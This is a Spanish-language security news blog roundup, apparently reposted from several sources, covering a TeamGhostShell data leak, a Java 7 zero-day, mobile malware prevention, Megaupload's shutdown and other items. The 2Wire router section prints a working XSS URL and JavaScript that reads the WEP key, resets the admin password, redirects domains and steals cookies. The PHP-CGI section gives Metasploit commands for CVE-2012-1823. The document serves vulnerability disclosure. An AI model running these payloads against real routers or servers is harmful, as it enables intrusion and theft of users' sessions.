Filtran más de 1TB de bases de datos; CIA y MIT entre los afectados

El grupo de hackers TeamGhostShell liberó más de un terabyte de información que supuestamente contiene miles de bases de datos de organizaciones públicas y privadas.

Entre los afectados se encuentra la CIA, el MIT y diversos grupos financieros de Wall Street. Además de los gobiernos de Estados Unidos, China y Japón, aseguraron los hackers.

De acuerdo con un comunicado liberado por grupo, son más de 100 las organizaciones afectadas por la operación Project Hell Fire, que comenzó a principios de año.

Los hackers señalaron que sus principales objetivos fueron empresas proveedoras de gobierno, en especial las que trabajan con los ejércitos y cuerpos de seguridad.

En el documento los responsables de los embates no aclararon las áreas a las que pertenece la información, ni las fechas durante las que se realizó el robo de datos.

La filtración en números
El grupo indicó que entre los documentos filtrados se encuentran disponibles más de seis mil millones de bases de datos con información sobre desarrollos tecnológicos del gobierno japonés y chino.

Los enlaces publicados por los hackers incluyen más de 105,000 millones de datos relacionados con el mercado cambiario estadounidense y tres puertos de acceso para los servidores del Departamento de Seguridad Nacional de los Estados Unidos, afirmaron.

Lo cibercriminales indicaron que como parte de la operación obtuvieron más de un millon de nombres, claves de acceso y contraseñas bancarias de usuarios estadounidenses.

En el boletín, distribuido a través de Twitter, los hackers aclaran que sólo divulgarán una parte de la información en su poder. Sin embargo, explicaron que el resto será entregada a quien lo solicite.

En el documento los hackers amenazaron con continuar con los ataques y sentenciaron que para finales de año pondrán en marcha un par de operaciones en conjunto con Anonymous.




Fuente: B:Secure
Fuente: Blackploit

[Exploit MSF + Vídeo] Vulnerabilidad 0day Java 7 Applet Remote Code Execution

Hace unos días Blackploit anunciaban que se había descubierto una grave vulnerabilidad en Java para la que aun no existe parche,pues bueno, hoy con más tiempo les quiero dejar con el Módulo para Metasploit del cual ya pueden gozar actualizando MSF, que aprovecha el fallo para obtener una sesión Meterpreter que ha sido probado con éxito en los siguientes entornos:

Mozilla Firefox en Ubuntu Linux 10.04
Internet Explorer / Mozilla Firefox / Chrome en Windows XP
Internet Explorer / Mozilla Firefox en Windows Vista
Internet Explorer / Mozilla Firefox en Windows 7
Safari en OS X 10.7.4

Aquí les dejo el vídeo demostrativo:

Fuente: Blackploit

Grave vulnerabilidad sin parche en Java

Hace algunos días se dio a conocer una vulnerabilidad en Java para la que no existe parche, que está siendo aprovechada por atacantes y cuyo código es público. Es el peor escenario posible.

Todavía no se sabe mucho sobre la vulnerabilidad, puesto que no ha dado tiempo a realizar un estudio exhaustivo, pero lo divulgado por ahora nos sitúa en el peor escenario posible.

FireEye descubría un servidor con un .jar que aprovechaba una vulnerabilidad. Por tanto, alguien la conoce y está aprovechando el fallo. A través de un dominio de tercer nivel dinámico (aa24.net) y un servidor de correo web de una compañía china (que probablemente haya sido atacada), se está (todavía) distribuyendo malware gracias a ese fallo en Java.


A través de un índice en la carpeta "meeting" del servidor, muy ofuscado con Javascript, el malware que se está distribuyendo es este:
https://www.virustotal.com/file/09d10ae0f763e91982e1c276aad0b26a575840ad986b8f53553a4ea0a948200f/analysis/
y
https://www.virustotal.com/file/8c9483b6b29a7f75054a9520bafbfcec145e9bc4cac17494d61308dc71beadc0/analysis/


El problema afecta a la última versión de Java en su rama 7, hasta su "update 6". No afecta a la rama 6, que todavía se mantiene pero que se encuentra en periodo de "extinción". Funciona sobre los principales navegadores e incluso con EMET activo.


A pesar de que los investigadores que lo descubrieron no ofrecieron detalles, un tercero ha publicado una prueba de concepto para explotar el fallo, con lo que se abría la puerta a que cualquiera pudiera explotarla.

El código es sencillo, limpio, funcional y fiable. Compilar y lanzar. Poco después, se ha introducido como módulo en Metasploit.

Esto licencia a que cualquier atacante pueda comenzar a distribuir su propio malware (muy probablemente durante los próximos días se pueda ver en Blackhole, el kit de explotación de moda entre los atacantes). Si, como ya hemos mencionado en más de una ocasión, una máquina virtual de Java no actualizada es lo que más aprovechan los creadores de malware para distribuir sus muestras, esta vulnerabilidad permite "abrir el mercado" también entre los actualizados.




En ausencia de un parche eficaz, no existe una forma sencilla de mitigar el problema. Lo más recomendable es deshabilitar Java del navegador. No se sabe cuándo solucionará Oracle el problema. Su ciclo cuatrimestral de actualizaciones, sugiere que hasta el 16 de octubre puede que no parcheen el gravísimo problema. Desde luego, Oracle no suele publicar parches fuera de ciclo. En contadas ocasiones lo ha hecho con su base de datos, su producto estrella. Pero menos aún con Java desde que le pertenece.

En abril de 2010 Tavis Ormandy y Rubén Santamarta descubrieron un grave fallo de seguridad en JRE. A Ormandy le dijeron desde Oracle que no lo consideraban tan grave como para publicar nada antes del periodo establecido. Una semana después, publicaban un parche fuera de ciclo (Java 6 Update 20), que no acreditaba la corrección de la vulnerabilidad. Tuvieron que comprobar que, simplemente, el fallo dejaba de darse, pero no había confirmación oficial.

Fuente: http://unaaldia.hispasec.com
Fuente: Blackploit

DVD de la DEFCON 20

Hace ya casi un mes que se celebro el evento de hacking DEFCON y ha sido liberado el DVD de edición  20 que se celebro en la Vegas. El DVD contiene muchísimo material, entre ellos las presentaciones de las exposiciones, fotos varias, Ebooks, Videos, Herramientas, extras y mucho más, les dejo aquí el listado de directorios y archivos que trae el DVD:


Descarga DVD DEFCON 20

Pruebas técnicas en entrevistas de trabajo, ¿vale todo?

Está claro que, en los tiempos que corren, triunfar en una entrevista de trabajo es algo difícil, cada día hay mas 'competencia' en el mercado laboral y debido al aumento de oferta, el nivel exigido sube y sube.

Todos hemos visto la típica oferta de trabajo en la que piden toda clase de certificaciones -algunas veces hasta inventadas- que van acompañadas de unos sueldos bastante poco competitivos, pero de lo que hoy me gustaría hablar es de las cada vez mas habituales pruebas técnicas que acompañan las entrevistas.

Recientemente una persona me contaba que, en una entrevista para un puesto de auditor, le habían pasado una suerte de cuestionario en el que le preguntaban, entre otras cosas, lo siguiente:

- Cita el flag de Nmap para realizar un escaneo 'X-mas'

- Cita los flags de SQLMap para listar tablas y columnas de una aplicación vulnerable

Me contaba esta persona que el resto de preguntas eran del mismo estilo, mas de memoria que de conocimiento y según me las iba formulando, admito que en muchas ocasiones me quedé en blanco, conocía todas las herramientas pero nunca me había parado a memorizar los flags.

Siempre he pensado que en cualquier situación 'normal' tener Google de mi lado y los help de la herramienta eran mas que suficientes para recordarme como funcionaba.

Esa conversación me llevó a pensar en las entrevistas para programadores, de esas en las que sientan al candidato frente a un Eclipse, Vi o similar y le dicen 'haga usted tal aplicación'

Y caí en la cuenta de que incluso librerías como 'CAPICOM', que he usado intensivamente en estos últimos 5 o 6 años, en aplicaciones públicas como SSLCop, Brute12 o CertDump y otros varios proyectos laborales, en realidad no es que sepa al dedillo sus métodos, sino que tengo en mi HD un montón de ejemplos que voy reciclando cuando los necesito y lo que me falta, lo investigo ad-hoc para esa eventualidad.

Evidentemente, en una entrevista de trabajo con un Eclipse delante y un 'añada usted un certificado al store de Windows' (algo que he hecho cien veces) tendría que tomarme un largo tiempo para intentar recordar el código que ya había realizado.

Lo que me lleva a preguntarme si ese tipo de entrevistas de trabajo sirven para algo mas allá de intentar localizar personas que gocen de una memoria privilegiada por encima de un conocimiento técnico real.

Yo entiendo que para un puesto de auditor, una pregunta indispensable podría ser 'como haría vd un inventario de servicios en una red' y en ese punto, que el candidato se explaye con herramientas y metodologías, sin entrar a tan bajo nivel.

O incluso, como ya he visto en otras ocasiones, que se le de al candidato una URL / IP para que audite desde su casa y luego entregue un informe al respecto, lo que sin duda sería bastante más aproximado a una actividad laboral normal, y permitiría ver al candidato no solo su conocimiento técnico, sino también su creatividad y capacidad de adaptación

No soy experto en RRHH y probablemente alguien que si lo sea pueda darme un montón de argumentos convincentes de por que una entrevista de trabajo tipo examen sirve para elegir un buen candidato, pero yo, creo que existen mejores métodos. 

Fuente: SecurityByDefault

BackTrack 5 R3

El equipo de desarrollo de BackTrack ha informado que lanzará un Release R3 de esta distribución de Pruebas de Penetración en 2 semanas (13 de Agosto).

Este lanzamiento se centra en la corrección de errores e incorporan más de 50 nuevas herramientas.

Cuando salga el Release R3 los usuarios actuales de BT5 puede simplemente actualizar a la última versión utilizando los comandos clásicos de actualización.

Más información se dará a conocer junto con la lista completa de las nuevas herramientas, el 13 de agosto.

A esperar se ha dicho.

Fuente: Blackploit 

Audiolip, envía mensajes de voz a Twitter y Facebook

Audiolip es una nueva aplicación web que te ofrece la posibilidad de grabar un mensaje corto de no más de 15 segundos con tu voz, para enviarlo a Twitter, Facebook o compartirlo con quien quieran.

Para utilizar el servicio crean una cuenta y luego de la confirmación a través de email, ya pueden comenzar a grabar el micro-podcast desde la web.

Una vez terminado lo comparten en Twitter, Facebook o simplemente copian la url y la comparten con sus amigos.

También ofrecen un número de teléfono al que pueden llamar gratuitamente utilizando algún servicio web que les permita llamar a números gratis de Estados Unidos o directamente si se encuentran en Inglaterra o Polonia, también tienen números de teléfono a los cuales pueden llamar y grabar el mensaje por esa vía.

Pero todo no termina allí, ya que los visitantes pueden grabar un mensaje en respuesta al nuestro, dejar un comentario de texto, dar un LoveIt (similar al Me Gusta de Facebook) y descargar el MP3 o sea que no solo es grabar y compartir, también nos permite interactuar con otros.

Una propuesta interesante que nos permite expresar mucho más que los 140 caracteres que nos permite Twitter, aunque quizás para Facebook sea un mensaje de voz muy corto, ya que allí podemos escribir mucho más

A continuación el vídeo oficial de presentación del servicio,

Fuente: Geek's Room

Vías de infección para dispositivos móviles, prevención y mitigación

Los dispositivos móviles se ven afectados por malware específico y, por ello, se hace un repaso sobre las formas por las que este tipo de dispositivos se pueden infectar, los efectos que pueden ocasionar y cómo prevenirlos y mitigarlos.

Según varios informes de compañías de seguridad como ESET, Sophos, Viruslist, McAfee o Symantec, se pone en relieve un aumento considerable del malware para dispositivos móviles.

Esto es debido, en parte, al aumento del uso de dispositivos móviles con acceso a Internet, circunstancia que, unida a un desconocimiento de los riesgos que tiene el uso inadecuado de estos dispositivos, hace que la posibilidad de contagio por malware sea alta, como se ha demostrado con la aparición de botnets para smatphones .

Por otro lado, tendencias como el «BYOD» (Bring Your Own Device o trae tu propio dispositivo), que se está imponiendo en las empresas, hace que la compartición del uso del dispositivo con fines empresariales y particulares, puede ocasionar que el problema de las infecciones repercuta negativamente en la empresa provocando un cambio en sus políticas de seguridad, de forma que puedan convivir en el mismo dispositivo el uso privado y profesional. De hecho, ya se está desarrollando software que trata de solucionar esta problemática, como es el caso del instituto Fraunhofer, para la tecnología de la seguridad de la información con Bizztrust , y el de la empresa Cisco con Cisco’s Highly Secure BYOD Solutions .

Independientemente de la adopción de este tipo de soluciones, es necesario conocer las vías de contagio que usa el malware en los dispositivos móviles, con el fin de ser capaces de prevenir esa infección. También, es importante minimizar los efectos del contagio, en caso de llegarse a producir.

Vías de contagio

Actualmente, las vías de contagio más comunes en los dispositivos móviles son:

• Vulnerabilidades. Provocadas por un desarrollo inadecuado del software, en cuanto a nivel de seguridad y pruebas. Las vulnerabilidades pueden estar presentes en los sistemas operativos y en las aplicaciones que se instalan. Para solucionarlas, hay que instalar las actualizaciones de seguridad que los desarrolladores de software publican cuando los fallos son detectados y corregidos, tanto para el sistema operativo como para las aplicaciones instaladas. En el caso de algunos smartphones, puede ser un verdadero problema, ya que las actualizaciones del sistema operativo no siempre están disponibles cuando las publica el desarrollador del sistema, sino que es el proveedor del servicio de telefonía (operador) quién decide cuando sus usuarios disponen de la actualización.
• Ficheros. Recibidos a través de Bluetooth, correo electrónico, mensajería instantánea, redes sociales o descargados de Internet. Para prevenir esta vía de contagio, solo hay que descargar o aceptar ficheros de sitios de total confianza o de otros dispositivos conocidos. Estos ficheros pueden ser de varios tipos:
• ejecutables (.IPA para sistema operativo IOS, .APK para Android, .AXL y .COD para Blackberry y .jar para los que soporten Java)
• documentos ofimáticos (.PDF, .DOC, .XLS,...)
• multimedia (.AVI, .MPEG, .MOV...)
• Navegación web. Se han detectado algunos casos de infección al navegar en alguna página web manipulada para que detecte nuestro sistema, busque alguna vulnerabilidad y, utilizándola, nos infecte con el malware ("Drive-By-Download"). Para mitigar esta amenaza, se deben usar navegadores o programas que analicen las páginas web antes de cargarlas. Además, se debe navegar solo por sitios de confianza y ser muy cautos con los enlaces recibidos vía SMS/MMS, mail, redes sociales y mensajería instantánea, ya que podrían llevarnos a una página web fraudulenta.
• Aplicaciones maliciosas. Hay aplicaciones que realmente son malware "disfrazado". Este tipo de aplicaciones, normalmente, están en mercados o tiendas "alternativas" aunque, en algunos casos, se han encontrado aplicaciones maliciosas en los canales oficiales de distribución. La forma de prevenir esta infección es descargar aplicaciones solo de los sitios oficiales, y además buscar información sobre la misma en foros y páginas especializadas ya que, de lo contrario, sólo tendremos la confianza que nos ofrezca el desarrollador de la aplicación.

Aunque estas son las vías más habituales, también hay que tener en cuenta otros riesgos importantes como las capacidad de comunicación vía Wi-Fi de estos equipos, unido al crecimiento de puntos de acceso Wi-Fi gratuitos, que los hacen víctimas potenciales del robo de información mediante el espiado de la red (sniffing). Para evitarlo, no hay que usar estos servicios Wi-Fi para acceder a sitios web en los que se requiera introducir información personal o confidencial. También hay que asegurarse de que en caso de usar este tipo de conexiones, las páginas a las que accedemos dispongan de cifrado en las comunicaciones (HTTPS).

Otro factor a tener en cuenta en la seguridad de este tipo de dispositivos, es la eliminación de ciertas protecciones que hay en los sistemas operativos, mediante el «Jailbreak» o el «rooteado». Mediante el primero se consigue que el sistema operativo IOS (Apple) pueda instalar aplicaciones que no están firmadas, y por tanto, que no están en la tienda de Apple (Applestore). Esto supone una reducción en la seguridad del dispositivo debido a que solamente las aplicaciones de la tienda oficial se han verificado y aportan un nivel de confianza alto. En el caso de los dispositivos Android, el sistema puede instalar aplicaciones firmadas (configuración por defecto) o se puede configurar para poder instalar cualquier aplicación, aunque no sea de confianza. El proceso de "rooteado" consiste en poder darle a una aplicación permisos "especiales", lo que implica mayor riesgo en la operativa que pueda llevar a cabo esta aplicación. Estas acciones incrementan la posibilidad de instalación de un software malicioso en un equipo, ya que disminuyen el nivel de seguridad del sistema. Por ese motivo se desaconsejan totalmente cuando el terminal va a ser utilizado para uso en la empresa.

Mitigación de la infección

Una vez que el dispositivo ha sido infectado, y se ha detectado, hay que llevar a cabo una serie de acciones para reducir los efectos perjudiciales que podrían llegar a surgir. Estas acciones, están relacionadas con las funcionalidades del malware para este tipo de dispositivos y con el uso que se haga del mismo, ya que no es igual que sea un “Smartphone” para uso personal que el utilizado para el trabajo. En función del malware que nos haya afectado, tendríamos estos posibles efectos y medidas a adoptar:

• Robo de datos de contactos. Es necesario avisar a nuestros contactos e indicarles que es posible que reciban alguna comunicación "extraña", incluso en nuestro nombre. El malware podría acceder a nuestros contactos y redirigirles alguna notificación para transmitir más malware o redirigirlos a sitios web fraudulentos.
• Robo de contraseñas. Será necesario el cambio de nuestra contraseña de los servicios que se haya usado desde este dispositivo, ya que podrían haber sido robadas. Con el robo de credenciales se podrá suplantar la identidad en el servicio en cuestión. Además, en caso de tener la misma contraseña en varios servicios (¡mala práctica en el uso de contraseñas!), habría que cambiarla en todos aquellos en los que se use, incluso en los que no se ha accedido desde ese dispositivo, ya que a partir de unos servicios como correo o mensajería se pueden deducir otros que sí se usan como por ejemplo, las redes sociales. También hay que considerar el uso de un gestor de contraseñas .
• Robo de datos bancarios. La única forma de mitigar esta acción es informar a nuestro banco de lo sucedido, modificar las credenciales bancarias, y hacer un seguimiento exhaustivo de los movimientos de nuestras cuentas y tarjetas. Por otro lado, y en caso de que hayan usado ya esas credenciales con fines fraudulentos, es necesario realizar una denuncia ante las Fuerzas y Cuerpos de Seguridad del Estado o en un juzgado.
• Robo de información empresarial. En el caso de que el dispositivo móvil se utilice con fines profesionales, el malware podría robar información relativa a la empresa. La forma de mitigar esta acción es comunicárselo a la empresa para que tome las medidas necesarias como: cambio de contraseñas, aviso a clientes/proveedores/colaboradores. Una medida de prevención adecuada sería utilizar un software de codificación o cifrado  de información.

Recomendaciones a seguir

Para el uso de dispositivos móviles, especialmente cuando se compartan en el ámbito privado y en el empresarial, se deberán seguir las siguientes recomendaciones de forma genérica:

• Instalar un software antimalware 
• Mantener actualizado el sistema y las aplicaciones
• Precaución con la descarga y recepción de archivos
• Precaución con las conexiones no seguras (Wi-Fi y Bluetooth)
• Precaución al navegar por Internet, y sobre todo con los enlaces de correos, mensajes SMS o en redes sociales
• No eliminar las protecciones del sistema
• Cumplir con la directiva de contraseñas y usar un gestor  para las mismas
• Acceder a la red empresarial a través de redes privadas o VPN
• Utilizar el cifrado  de datos
• Establecer un protocolo de actuación en caso de robo o pérdida del dispositivo

Fuente INTECO 

Robo de cookies por router vulnerable (caso 2Wire)

Desde hace tiempo es conocido que los routers caseros están plagados de vulnerabilidades. En este caso mostramos como una serie de vulnerabilidades en routers 2Wire, al ser explotadas secuencialmente, permiten obtener remotamente los valores de las cookies de casi cualquier dominio.

El proceso de ataque sería el siguiente:
1. La víctima visita una página maliciosa con un módem vulnerable,
2. La página realiza pharming al router redirigiendo subdominios al servidor del atacante,
3. La página obliga a la víctima a realizar peticiones a los subdominios,
4. El atacante recibe en su servidor las cookies de los dominios.

Utilizamos subdominios inexistentes por dos razones. Al usar un subdominio inexistente el navegador no tiene la dirección IP en el cache. Y la segunda razon es que en caso de que exista algún error, la comunicación con el dominio original no se pierde.

Los routers 2Wire han tenido múltiples  vulnerabilidades  en los últimos años. Para realizar este ataque nos enfocamos en las siguientes:
1. Cross site scripting
2. Revelación de configuración (“url mágico”)
3. Reinicialización de contraseña con la clave WEP default

Algunos routers 2Wire poseen un cross site scripting reflejado en la variable THISPAGE de su interfaz de configuración web:

http://192.168.1.254/xslt?PAGE=A05&THISPAGE=</script><script>with(document)body.appendChild(createElement("script")).setAttribute("src","cfgpwn.js");</script><script>


Explotando el cross site scripting podemos estar en la misma zona del router y obtener acceso a sus propiedades, como la información de las páginas del router.

Inyectamos un script que nos permite leer la información de la configuración debido a la vulnerabilidad de revelación de configuración. Leemos el archivo y obtenemos la WEP default:

cfgpwn.js:

try {
    xmlhttp=new ActiveXObject("MSXML2.XMLHTTP");
} catch(e) {
    xmlhttp = new XMLHttpRequest()
}
xmlhttp.open("GET","/xslt?page=mgmt_data",false);
xmlhttp.send(null);
var info = xmlhttp.responseText;
var pass = "temporal";
var wep = info.substr(info.indexOf("encrypt_key\"\>0x")+15,10);

Utilizando la clave WEP default podemos definir una nueva contraseña de administración web. De la siguiente manera usamos la WEP para cambiar el password:

xmlhttp.open("POST","/xslt");
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("PAGE=A04_POST&THISPAGE=A04&NEXTPAGE=A04_POST&SYSKEY="+wep+"&PASSWORD="+pass+"&PASSWORD_CONF="+pass+"&HINT="+pass);

Ya que hemos definido un password, podemos obtener la sesión de administrador para obtener privilegios en el router. Para esto realizamos la siguiente petición:

xmlhttp.open("GET","/xslt?PAGE=A02_POST&THISPAGE=&NEXTPAGE=J01&CMSKICK=&PAGE=A02&NEXTPAGE=J01&SHOWHINT=1&PASSWORD="+pass, false);
xmlhttp.send(null);

Como administradores podemos agregar dominios a la lista de hosts. Agregamos subdominios de los dominios de los cuales queremos las cookies:

for (var i=0; i<dominios.length; i++) {
    dns=dominios[i];
xmlhttp.open("GET","/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME="+dns+"&ADDR="+ip,false);
    xmlhttp.send(null);
}


Obligamos a la víctima a realizar peticiones a los subdominios para que envíe las cookies:


for (var i=0; i<dominios.length; i++) {
    dns=dominios[i];
    document.write('<img src=http://'+dns+'>');
}


Todo esto se podría automatizar y realizar de forma oculta para la víctima. En el siguiente video se muestra la explotación de una forma visible:




Hay que entender que en este caso 2Wire ha publicado parches para todas estas vulnerabilidades hace tiempo, pero en muchas ocasiones no depende del usuario o fabricante el actualizar, depende del proveedor de servicio.

Contribución cortesía de Pedro “hkm ” Joaquín de Websec México 

Fuente: Security by Default

Google adquiere Motorola Mobility

Desde el Blog de Google escrito por el mismo Larry Page, nos informan que el trato con Motorola Mobility, esos creadores del StarTAC, y de los que primero apoyaron a Android ahora forman parte de Google.

Después de lograr el visto buena de Europa, Estados Unidos y China, Google por fin pudo comprar la división móvil de Motorola, aunque Motorola seguirá trabajando independiente del gigante de la tecnología con su licencia de Android, esta compra ayudará a cargar el negocio móvil.

Seguramente Google pondrá toda la carne al asador con esta compra, extendiendo su rango de teléfonos Nexus, ahora sólo hay que esperar que Motorola pueda proveer el Hardware necesario para la próxima generación de smartphones.

Mucha gente ya no usa laptops ni PC para lo cual Google se tiene que preparar en palabras de Larry Page “muchas veces la gente tienda a sobre estimar el impacto de la tecnología en el corto plazo , pero subestiman el significado a largo plazo. Muchos de los usuarios que se conecten a partir hoy pueden nunca utilizar un PC, y el impacto de esta transición será tan profundo como lo será la habilidad de solo tocar y jugar con tu teléfono”.

Fuente : Google Official Blog

Grave vulnerabilidad en PHP-CGI permite ejecutar código remoto en Apache

Eindbazen, un equipo de competiciones CTF, ha descubierto una vulnerabilidad en PHP-CGI (CVE-2012-1823) que permite pasar parámetros al intérprete de PHP, como -s o -r, a través de la URL. Por ejemplo añadiendo la cadena '?-s'.

Como resultado de la inyección de estos parámetros en la URL, se puede mostrar el contenido de archivos de código fuente (que puede incluir información confidencial como, por ejemplo, contraseñas de BBDD) o ejecutar código PHP arbitrario.

Aunque el parámetro '-r', para ejecutar código PHP, es filtrado en php5-cgi, dependiendo de las variables de entorno, esta medida de seguridad puede evitarse. PHP eliminó por error el código que protegía ante este problema en 2004.

Ya existen módulos para Metasploit (use exploit/multi/http/php_cgi_arg_injection


$ ./msfconsole
msf > use exploit/multi/http/php_cgi_arg_injection
msf  exploit(php_cgi_arg_injection) > set RHOST 192.168.178.210
msf  exploit(php_cgi_arg_injection) > set TARGETURI /phpinfo.php
msf  exploit(php_cgi_arg_injection) > set PAYLOAD php/exec
msf  exploit(php_cgi_arg_injection) > set CMD echo \"owned\">/var/www/html/owned.html
msf  exploit(php_cgi_arg_injection) > exploit

Solucion

Ya existen módulos de la herramienta de pentesting y hacking metasploit que permiten explotar esta vulnerabilidad por lo que se recomienda actualizar cuanto antes. Se puede hacer a través del código fuente, aunque se recomienda instalarlo a través de los mecanismos de actualización de paquetes de Linux. Para sistemas Windows, se puede descargar de la web http://windows.php.net/download/.

Como alternativa, si no se puede actualizar, el fabricante propone las siguientes reglas del módulo mod_rewrite de Apache para bloquear las URLs maliciosas:

RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]

RewriteRule ^(.*) $1? [L]

Fuente: http://cert.inteco.es/     -        Blackploit.com

Vídeo: http://eromang.zataz.com/

Referencias y más información: 

http://www.pentester.es/

http://www.elladodelmal.com/

http://packetstormsecurity.org/ 

[Vídeo] Nuevas funcionalidades de Armitage

Armitage es una herramienta, que hace aun más fácil y gráfico el uso de Metasploit, que surgio hace mas de un año, ahora tiene muchas más utilidades y mejoras. Tiempo atrás se tenía que instalar manualmente para usarlo, hoy viene por defecto con MSF.

Es así que  les quiero dejar un vídeo para que vean algunas de las nuevas características, y para que los que no lo conocen comiencen a familiarizarse con él.

En el vídeo se muestra 10 clientes obtenidos con Armitage después de la explotación de un servidor remoto, se ven diferentes funcionalidades de Armintage y al final del vídeo se muestra lo fácil que es la gestión de una base de datos con 5.000 hosts a través de esta aplicación

 Para más info pueden visitar la web oficial de Armitage o pueden consultar más vídeos en Youtube.

Fuente: Blackploit

1 Millon por hackear a Google Chrome

El buscador quiere probar la seguridad de su browser dentro de la competencia Pwn2Own, en la que por ahora ha resultado invicto. Los ganadores deberán revelar los errores del navegador.

Cada año se desarrolla la competencia Pwn2Own, donde se les ofrece a investigadores de seguridad de todo el mundo la oportunidad de hackear navegadores por dinero.
Durante los últimos tres años, el único browser que salió del concurso ileso fue Google Chrome. Firefox, Safari e Internet Explorer fueron vulnerados todas las veces.
El megabuscador entra a este concurso para que los usuarios le señalen errores en Chrome y puedan mejorar las futuras versiones del mismo.
La idea es que a los que puedan vulnerar el navegador se les entregue un millón de dólares en diferentes categorías. Además del dinero, todos los ganadores recibirán una Chromebook de regalo.
Adicionalmente, los hackers deberán entregar un informe detallado sobre los errores en Chrome para que Google pueda arreglarlos.

Fuente: Infierno Hacker

El FBI cierra Megaupload, una de las mayores webs de intercambio de archivos

El Departamento de Estado de EEUU, junto al FBI y otras autoridades internacionales, ha liderado una operación contra la popular página web de intercambio Megaupload, que ha sido clausurada, y contra varios de sus responsables, que han resultado detenidos y acusados en el estado de Virginia (EEUU) de conspiración para cometer un crimen y violación de la propiedad intelectual.
La operación se ha dirigido contra dos compañías, Megaupload Limited y Vestor Limited, y en estos momentos las páginas web Megaupload -intercambio de archivos- y Megavideo -visualización de vídeos en Internet-, ambas propietarias de las mismas compañías, se encuentran inaccesibles. El Departamento de Justicia acusa a seis de los responsables de estas compañías de crimen organizado y asegura que son "responsables" de "piratería masiva en todo el mundo de diferentes tipos de obras protegidas por derechos de propiedad intelectual". Además, en la nota hecha pública se asegura que estas páginas han generado más de 175 millones de dólares en actividades delictivas y que han causado "más de 500.000 millones de dólares en daños a los propietarios de las obras protegidas". La denuncia contra los acusados se cursó el 5 de enero en EEUU, y los cargos concretos son participar en una conspiración de crimen organizado, cometer infracciones de derechos de autor de forma masiva, lavado de dinero y dos cargos criminales de violación de la propiedad intelectual. Así, cada uno de los seis acusados se enfrentan a penas de hasta 50 años de prisión entre todos los cargos.

Un día después de las protestas contra la SOPA

Una operación que se produce un día después de que una serie de páginas web protestaran por la iniciativa SOPA, que busca promulgar una ley que, en EEUU, permita bloquear páginas web extranjeras que perjudiquen obras protegidas por derechos de autor. Fuentes policiales citadas por el diario estadounidense aseguran, sin embargo, que no hay conexión entre esta operación, llevaba a cabo tras una investigación de dos años, y la polémica sobre la SOPA. Megaupload, que desde la tarde del jueves se encuentra inaccesible, es una de las más importantes páginas web de intercambio de archivos del mundo. Está en funcionamiento desde 2005 y permite 'subir' todo tipo de archivos que después pueden ser descargados en cualquier otro ordenador. Asimismo, Megavideo permite a cualquier usuario publicar vídeos que después pueden visualizarse en cualquier parte, como hace YouTube. Ambas páginas web han sido habitualmente señaladas por las compañías de contenidos por facilitar la descarga y visualización de obras protegidas por derechos de autor. Ambos sitios, que muchos consideran centros de las descargas no autorizadas de música, películas, series o libros protegidos, ha sido perseguido por la industria del porno, las autoridades inglesas, francesas, italianas e incluso estadounidenses, Google y la RIAA a través de Mastercard, entre otras. Hasta ahora, la compañía había resistido amparada en que, además de alojar contenido protegido por derechos de autor, había muchos usuarios que utilizaban el servicio de intercambio de archivos de forma legítima y privada. Además, no dudaba en eliminar todo el contenido susceptible de estar protegido que las compañías reclaman. El pasado diciembre, una serie de grandes artistas, de Will.i.am a Jamie Foxx apoyaron la página web con un vídeo en la que alababan sus bondades.


Fuente: El Mundo.es

La televisión inteligente y Google TV triunfan en el CES

El CES ha comenzado y en sólo unas horas ha elevado la televisión inteligente conectada a Internet a los altares tecnológicos, Samsung, Sony y LG se posicionan como pioneros en esta técnica y Google TV los acompaña en su escalada. Actualidad constante, interactividad, conectividad ilimitada y nuevas aplicaciones son las principales características de la smart Tv de Samsung. Una televisión inteligente que se institucionalizada como una de las mejores televisiones del mercado gracias a su cámara integrada que permite navegar por Internet, realizar videoconferencias y seleccionar la programación con el sonido de la voz y movimientos corporales. Además, Samsung se ha unido junto a Sony y LG al proyecto de la plataforma web de televisión de Google. De este modo, Google TV parece que estará en la mayoría de los hogares de 2012 de mano de los grandes fabricantes de televisores, que han apostado seriamente por lo nuevo de Sergey Brinn. Sony fue la primera en apostar por esta nueva plataforma y ha presentado en el CES unos nuevos receptores no integrados al dispositivo con nombres de estrellas: SONY NSZ-GS7 y NSZ-GP9. LGtambién ha presentado en el CES sus televisores compatibles con Google Tv gracias al chipset L9. Las televisiones inteligentes de LG aúnan la tecnología 3D de sus pantallas con el sistema operativo Android de Google. La smart tv de LG también sorprende por su gran tamaño (de 55 a 72 pulgadas), el empleo de la tecnología 3D y la posibilidad de reconocimiento de comandos de voz, movimientos y gestos faciales como viene acostumbrado en Kinect de Xbox. También Vizio se ha unido al resto de compañías e incorporará en sus últimos modelos Google TV.  Además, Ubuntu TV, del sistema operativo Linux ofrece la alternativa a Google TV en un mercado que se expande y compite cada vez más consigo mismo. Quién ganará la carrera aún es pronto para saberlo pero que la convergencia entre televisión e informática avanza a pasos de gigante para ofrecer al espectador la mejor experiencia posible es un hecho.


Fuente:Dirigentes Digital

Explicación de la ley SOPA y porqué hay que DETENERLA!

Simplemente un vídeo imperdible donde explican (for dummies) la implicancias desastrosas de la ley SOPA en la libertad no sólo de internet, si no también de cada individuo y las ventajas para la empresas de la mafia de contenido. Dejo el vídeo:

 

Fuente: Segu-Info 

            Blackploit

Un gusano en Facebook roba 45.000 contraseñas

Un gusano informático conocido como Ramnit se ha hecho con las contraseñas de 45.000 usuarios de Facebook, la mayoría de Reino Unido y Francia. La agencia de seguridad Securlet, que ha informado del suceso, sospecha que los atacantes han utilizado Ramnit para robar las credenciales de las cuentas de las víctimas en Facebook con el fin de transmitir luego enlaces maliciosos a sus amigos. Y, lo que es aún peor, la agencia de seguridad afirma que Ramnit, al hacerse con las claves de los usuarios afectados, también puede obtener acceso a otros servicios web (Gmail, Corporate SSL VPN, Outlook Web Access, etc.), ya que la gente tiende a repetir las mismas claves. Mientras tanto, Facebook aseguró a las víctimas del ataque que la situación está bajo control. "Nuestros expertos en seguridad han revisado los datos y, aunque la mayoría de la información estaba fuera de fecha, hemos tomado medidas correctivas para todos los usuarios afectados a fin de garantizar la seguridad de sus cuentas", afirmó un representante de la red social. El gusano fue descubierto por primera vez en abril de 2010 robando credenciales de los internautas. Además, unas 800.000 computadoras fueron infectadas por él entre septiembre y finales del año pasado.  

Fuente: http://actualidad.rt.com/ciencia_y_tecnica/internet_redes/issue_34538.html